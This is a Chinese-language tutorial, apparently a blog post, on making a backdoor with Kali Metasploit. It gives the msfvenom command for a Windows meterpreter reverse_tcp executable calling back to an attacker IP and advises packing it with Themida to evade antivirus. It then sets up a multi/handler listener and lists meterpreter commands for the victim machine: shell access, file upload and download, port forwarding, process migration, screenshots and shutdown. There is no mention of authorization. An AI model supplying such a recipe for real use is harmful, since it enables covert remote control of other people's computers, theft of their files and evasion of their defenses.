kali metasploit 制作后门程序远程操控基本使用方法

kali metasploit制作后门程序远程操控基本使用方法

1.后门程序的制作与加密

后门的实质就是木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe

lhost后面加的是本机ip,lport后面加的是想要打开的端口号

执行后会在本地生成一个biyu.exe的文件

如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。

下载Themida

kali metasploit 制作后门程序远程操控基本使用方法_第1张图片
直接文件拖进去,点击protect会生成一个protect

这会使他躲过大多数杀毒软件扫描

然后将他传到win的系统就可以开始远程操控了

2,kali操控win

在这里使用Xshell进行演示

打开终端

msfconsole   

kali metasploit 制作后门程序远程操控基本使用方法_第2张图片

use exploit/multi/handler

kali metasploit 制作后门程序远程操控基本使用方法_第3张图片

set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.31.53
set lport 10000
run

ip与端口和文件创建时一致

kali metasploit 制作后门程序远程操控基本使用方法_第4张图片
此时已开始了监听模式

回到win运行exe

kali metasploit 制作后门程序远程操控基本使用方法_第5张图片
成功连接

此时就可以操纵win了

**

一些基本命令

**

1、基本命令(包含meterpreter和msf终端、ruby接口、目标shell交互的命令)

background(进程隐藏至后台)

sessions(查看已经成功获取的会话,-i 恢复会话)

quit(关闭当前会话)

shell (获取系统控制台shell,如果目标系统命令行可执行程序不存在或禁止访问, 则shell命令会出错)

irb(与Ruby终端交互,调用metasploit封装好的函数;在irb中还可以添加metasploit附加组件railgun,直接与windows本地API进行交互)

2、文件系统命令(与目标文件系统交互,包括查看、上传下载、搜索、编辑)

cat(目标系统文件交互)

getwd(获取目标机当前工作目录,getlwd本地当前工作工作目录)

upload(上传文件或文件夹到目标机 -r 递归)

download(从目标机下载文件或文件夹 -r 递归)

edit(调用vi编辑器,对目标上的文件进行编辑)

search(对目标机的文件进行搜索)

3、网络命令(查看目标网络状况、连接信息,进行端口转发等)

ipconfig(获取目标主机上的网络接口信息)

portfwd(端口转发:将目标主机开放但不允许访问的端口进行转发)

route(显示目标主机路由信息)

4、系统命令(查看目标系统信息、对系统进行基本操作等)

ps(查看目标机正在运行的进程信息)

migrate(将meterpreter会话进程迁移到另一个进程内存空间)

execute(在目标机上执行文件)

getpid(当前会话所在进程的pid值)

kill(终结指定的pid程序)

getuid(获取当前会话用户名)

sysinfo(获取系统信息)

shutdown(关闭目标主机)

5、用户接口命令

screenshot(截获被控主机当前桌面)

你可能感兴趣的:(Metasploit内网,安全,渗透测试)